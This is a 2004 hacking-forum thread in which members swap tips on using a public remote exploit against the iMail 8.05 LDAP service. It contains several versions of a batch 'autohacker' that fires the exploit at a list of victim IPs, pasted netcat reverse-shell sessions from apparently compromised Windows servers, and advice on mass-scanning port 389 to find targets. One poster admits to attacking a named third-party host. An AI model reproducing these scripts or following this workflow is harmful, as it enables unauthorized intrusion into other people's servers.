hacking contest

hacking exploits security forum
hacking
compliance articles
upgrade backup exec
information security consultant

Pages: 1, 2, 3
Sedolf
Here is your proper TCP Reply...I did some scans..IP # 2489 worked rolleyes.gif
TCP ports: 25

TCP 25:
[220 *.*.*.se (IMail 8.05 21779-3) NT-ESMTP Server X1]

Now just need to know which os o.O

EDIT: I just dared to hack it, all os, all versions...no shell, no crash...NOW its strange! I think this exploit is crap..

Arnie
why the <censor> are you posting the ip from someone who happen to have imail installed?? mad.gif
DiJiTooL
try with the combinaison 0 1
this combinaison seem to be universel
if i use the profesional offset on my evaluation version i get a shell
and ph33r @coromputer have tested with the winxp offset on his 2k machine and he got a shell
Raedemer
QUOTE (Sedolf @ Feb 20 2004, 03:22 PM)


EDIT: I just dared to hack it, all os, all versions...no shell, no crash...NOW its strange! I think this exploit is crap..

I don't think so, try your own imail server before saying this exploit is crap ! I think kralor tested it succesfully before bringing this exploit to public.
equinox
no one should call kralor or his exploits crap hes a dude bringing the best exploits around, i have compiled it fine in VS6 no shell yet but imail is very rare, exploit is fine its the hosts that suck biggrin.gif
MxMx
QUOTE (equinox @ Feb 21 2004, 10:48 AM)
no one should call kralor or his exploits crap hes a dude bringing the best exploits around, i have compiled it fine in VS6 no shell yet but imail is very rare, exploit is fine its the hosts that suck biggrin.gif

yea tru tru ..
there are very few hosts which have installed Imail ..
but the exploit itself is really great biggrin.gif
matze
Scanning with Scan1000.exe on port 389

+----------------------------------------------------+
ª iMail LDAP Autohacker ª
ª v3.12.10.3/v8.05 ª
+----------------------------------------------------+

please enter your ip: xx.xx.xx.xxx
please enter your listening port:
please enter iMail version: 0
please enter Target OS: 1

[+]------------------------------------------------------[+]
[+] checking banner on xx.xx.xx.xxx ...
[+] Found iMail Server 8.05 !! biggrin.gif
[+] Connecting to xx.xx.xx.xxx ...Done
[+] Sending magic packet ...Done
[+] Starting autoh4x0r and sending commands MASTER !!
Microsoft Windows 2000 [Version 5.00.2195]
© Copyright 1985-2000 Microsoft Corp.

C:\WINNT\system32\


and Boom the shell is Open biggrin.gif

mfg
matze
OldSkool
hm u did enter target OS: 1 (its XP)

and you get a win2000 shell ohmy.gif?
Leonnetje
Matze, can you please paste the code for that Auto-hacker in here ?? Or attach the file or make a download-link ???

I'm very curious what's in there.....
matze
yes


version
0 <---8.05 professional
os version
1 <---- windows xp universal

and it get a win2000shell

mfg
matze






Leonnetje
I see, it's in the download-section... :/

2 Bad i can't download it... we'll have to figure something out myself then blink.gif
matze
Leonnetje
QUOTE
Matze, can you please paste the code for that Auto-hacker in here ?? Or attach the file or make a download-link ???

I'm very curious what's in there.....


you can get the autohaxxor in the download section


mfg
matze
Leonnetje
QUOTE (matze @ Feb 22 2004, 12:24 PM)


you can get the autohaxxor in the download section


mfg
matze


Unfortunately i can't download stuff from there... you need to have 50 postings to axx that section sad.gif
Janosch
nice matze, well done

which version of the exploit do you use?

imail1.1exe or an older one?

matze
QUOTE
nice matze, well done

which version of the exploit do you use?

imail1.1exe or an older one?


yes i use the old autohaxxer and you must rename the imail1.1exe to mail.exe

on listening port <--- you must press return
Feuerstein
im glad to announce having had a shell, too

CODE
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\>nc -lvp 5555
listening on [any] 5555 ...
*.*.*.*: inverse host lookup failed: h_errno 11004: NO_DATA
connect to [*.*.*.*] from (UNKNOWN) [*.*.*.*] 1045: NO_DATA


Microsoft Windows 2000 [Version 5.00.2195]
(C) Copyright 1985-2000 Microsoft Corp.

C:\WINNT\SYSTEM32>
C:\WINNT\SYSTEM32>


y0 guys, it works biggrin.gif

i used sploit from Corumputer

any suggestions howto secure ? biggrin.gif
dragonfly
wow Feuerstein hehe very nice indeed and is it fast biggrin.gif ?
peter_BB
exploitable systems seem rare but the sploit works yeah... but guess it will be patched soon
dragonfly
yeah so lets rock now and exploit the servers now!
jpno5
heres the patch if any 1 wants it

hotfix
Feuerstein
ah, jpno5, thx a lot smile.gif but do ya know any cmdline options to run in silent mode ? wink.gif
MxMx
QUOTE (jpno5 @ Feb 22 2004, 03:56 PM)
heres the patch if any 1 wants it

hotfix

this hotfix is still vuln. smile.gif
a friend of mine tested it yesterday .. biggrin.gif
Max_Payne
seems obvious to everyone that the exploit really works biggrin.gif

the only thing now is that servers running iMail 8.05 are very rare..haven't found 1 yet and i've done quite a bit of searching wink.gif
usch
i dont agree with you.i've found some within 15 minutes of scanning and got 1 shell till now biggrin.gif

dragonfly
how do you know the version/os of the server then blink.gif
Feuerstein
QUOTE (dragonfly @ Feb 22 2004, 07:39 PM)
how do you know the version/os of the server then  blink.gif

just hammer all 6 combinations within 3 seconds on to the server and be lucky wink.gif

QUOTE (jpno5 @ Feb 22 2004, 03:56 PM)

this hotfix is still vuln. smile.gif
a friend of mine tested it yesterday .. biggrin.gif
did ya find a better one ?
Demoman
CODE

echo off
cls
echo +---------------------------------------------------------+
echo ¦                    IMail Autohacker                     ¦
echo ¦                   (c) 2004 by Demoman                   ¦
echo +---------------------------------------------------------+
echo.
echo.
set /p ownip=                Enter Your IP:
set /p vicip=                Enter the Victims's IP:
set /p ncport=                Enter the NC's listening port:
echo.
imail.exe %vicip% %ownip% %ncport% 0 0
imail.exe %vicip% %ownip% %ncport% 1 0
imail.exe %vicip% %ownip% %ncport% 2 0
imail.exe %vicip% %ownip% %ncport% 0 1
imail.exe %vicip% %ownip% %ncport% 1 1
imail.exe %vicip% %ownip% %ncport% 2 1



That is a very easy version of an autohacker. You must still have nc listening and you can check only single ips. DonT think its professionel or something, because it is only a batchfile.

Greetz Demoman
dragonfly
wow nice is it possible to get it from a .txt file ??
thanks laugh.gif
Siliconized
CODE

echo off
cls
echo +---------------------------------------------------------+
echo ¦                    IMail Autohacker                     ¦
echo ¦                   (c) 2004 by Demoman                   ¦
echo +---------------------------------------------------------+
echo.
echo.
set /p ownip=                Enter Your IP:
set /p file=                Enter the Filename:
set /p ncport=                Enter the NC's listening port:
echo.
for /f "eol=; tokens=1*" %%i in (%file%) do imail.exe %vicip% %ownip% %ncport% 0 0
for /f "eol=; tokens=1*" %%i in (%file%) doimail.exe %vicip% %ownip% %ncport% 1 0
for /f "eol=; tokens=1*" %%i in (%file%) doimail.exe %vicip% %ownip% %ncport% 2 0
for /f "eol=; tokens=1*" %%i in (%file%) doimail.exe %vicip% %ownip% %ncport% 0 1
for /f "eol=; tokens=1*" %%i in (%file%) do imail.exe %vicip% %ownip% %ncport% 1 1
for /f "eol=; tokens=1*" %%i in (%file%) do imail.exe %vicip% %ownip% %ncport% 2 1


Done a bit modification and that may help you if u got a file with ip wink.gif
Demoman
QUOTE
echo off
cls
echo +---------------------------------------------------------+
echo ¦                    IMail Autohacker                     ¦
echo ¦                   © 2004 by Demoman                   ¦
echo +---------------------------------------------------------+
echo.
echo.
set /p file=                Enter the Filename: 
If "%file%" =="" GoTo CLS
set /p ownip=                Enter Your IP:
set /p file=                Enter the Filename:
set /p ncport=                Enter the NC's listening port:
echo.
for /f "eol=; tokens=1*" %%i in (%file%) do imail.exe %vicip% %ownip% %ncport% 0 0
for /f "eol=; tokens=1*" %%i in (%file%) do imail.exe %vicip% %ownip% %ncport% 1 0
for /f "eol=; tokens=1*" %%i in (%file%) do imail.exe %vicip% %ownip% %ncport% 2 0
for /f "eol=; tokens=1*" %%i in (%file%) do imail.exe %vicip% %ownip% %ncport% 0 1
for /f "eol=; tokens=1*" %%i in (%file%) do imail.exe %vicip% %ownip% %ncport% 1 1
for /f "eol=; tokens=1*" %%i in (%file%) do imail.exe %vicip% %ownip% %ncport% 2 1
CLS




Yes Siliconized, i have this version too. (fixed one thing)
dragonfly
srry m8 but that one doesn't work sad.gif
dragonfly
what to do?
Can someone fix the bug because none works (only the single ip)
Demoman
okay i willl fix it

QUOTE

echo off
cls
echo +---------------------------------------------------------+
echo ¦                    IMail Autohacker                    ¦
echo ¦                  © 2004 by Demoman                  ¦
echo +---------------------------------------------------------+
echo.
echo.
set /p file=                Enter the Filename: 
set /p ownip=                Enter Your IP:
set /p ncport=                Enter the NC's listening port:
echo.
for /f "eol=; tokens=1*" %%i in (%file%) do imail.exe %%i %ownip% %ncport% 0 0
for /f "eol=; tokens=1*" %%i in (%file%) do imail.exe %%i %ownip% %ncport% 1 0
for /f "eol=; tokens=1*" %%i in (%file%) do imail.exe %%i %ownip% %ncport% 2 0
for /f "eol=; tokens=1*" %%i in (%file%) do imail.exe %%i %ownip% %ncport% 0 1
for /f "eol=; tokens=1*" %%i in (%file%) do imail.exe %%i %ownip% %ncport% 1 1
for /f "eol=; tokens=1*" %%i in (%file%) do imail.exe %%i %ownip% %ncport% 2 1

dragonfly
LOL still doesn't work biggrin.gif
thnx for trying m8 but still nothing hehehe
dragonfly
it keep saying:

error: <port> must be between 1 and 65535
Demoman
yes that is the normal portrange. What did you type in??
dragonfly
just port 99
you try!!
Demoman
QUOTE

+---------------------------------------------------------+
ª                    IMail Autohacker                           ª
ª                  ® 2004 by Demoman                      ª
+---------------------------------------------------------+


                Enter the Filename:  result.txt
                Enter Your IP: xxx.xxx.xxx.xxx
                Enter the NC's listening port: 99


   [Crpt] iMail LDAP service v3.12.10.3/v8.05 remote sploit by kralor [Crpt]
                 www.coromputer.net && undernet #coromputer

[+] Connecting to xxx.xxx.xx.x                  ...Done
[+] Sending magic packet                         ...Done

   [Crpt] iMail LDAP service v3.12.10.3/v8.05 remote sploit by kralor [Crpt]
                 www.coromputer.net && undernet #coromputer

[+] Connecting to xxx.xx.xxx.x                 ...Done
[+] Sending magic packet                         ...Done


Everything works fine
dragonfly
hmm weird wink.gif
i don't get it
dragonfly
wowie it works now

thnx a million demoman
Leonnetje
QUOTE (Demoman @ Feb 22 2004, 06:51 PM)
That is a very easy version of an autohacker. You must still have nc listening and you can check only single ips. DonT think its professionel or something, because it is only a batchfile.

Greetz Demoman

Tnx Demoman !! That'll do the job, now let's test this thingy....
MasteriX
demoman's one works altough i haven't got a shell yet
Leonnetje
QUOTE (MasteriX @ Feb 23 2004, 05:02 PM)
demoman's one works altough i haven't got a shell yet

Same here.... no shells.

Not even vulnerable scans ... mad.gif
DerangeD
I had one shell but it closed after my first command blink.gif

well i will keep trying smile.gif

yeyo
I didn't try it personally, but I have a friend that got some shells biggrin.gif

I'll ask him how he did it biggrin.gif


so, the exploit works wink.gif
ssapp
the folks thats saying no shells yet I think are just scanning 389 and running the sploit on those boxes......you need to do a banner scan to see if you are actually attacking imail boxes.......they are very few and beyond
Leonnetje
QUOTE (ssapp @ Feb 24 2004, 07:32 PM)
the folks thats saying no shells yet I think are just scanning 389 and running the sploit on those boxes......you need to do a banner scan to see if you are actually attacking imail boxes.......they are very few and beyond

That's exactly the problem... there aren't many vulnerable hosts out there, cause almost no host is running on iMail version 8.05.

And yes... i always do a banner scan biggrin.gif
noxx
thats true, i scanned many ips and i didn't find any imail server... i think there are many better programs so nobody uses imail biggrin.gif
MysteryMan
hmm i try mayby i do something with this smile.gif ...

thanks
Niekos
Hi,

Can some one explain a few things for me?
What's nc?
And could some one plz put down some steps to use this exploit?
I think they are:

1. Scan 389
2. Check for correct version of imap
3. Get OS
4. Use exploit
5. BUT THEN??
6. Must you get a shell in a dos box??

Thx in advance
This is a "lo-fi" version of our main content. To view the full version with more information, formatting and images, please click here.

 
Invision Power Board © 2001-2005 Invision Power Services, Inc.